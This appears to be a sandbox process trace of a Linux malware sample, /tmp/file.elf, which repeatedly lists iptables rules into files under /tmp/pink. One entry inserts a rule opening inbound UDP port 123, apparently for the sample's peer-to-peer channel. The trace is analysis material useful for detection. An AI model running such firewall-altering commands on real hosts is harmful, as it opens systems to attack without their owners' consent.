    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:27
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:27
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:05:43
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:05:43
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:43
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:43
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:05:59
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:05:59
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:59
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:59
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:06:15
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:06:15
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:15
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:15
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:06:31
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:06:31
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:31
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:31
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:06:47
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:06:47
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:47
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:47
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:05:55
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:05:55
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:05:55
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L INPUT > /tmp/pink/p2p_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:55
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:55
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L INPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:05:55
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:05:55
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPT"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:55
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:55
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:06:55
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:06:55
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:06:55
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L INPUT > /tmp/pink/p2p_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:55
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:06:55
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L INPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9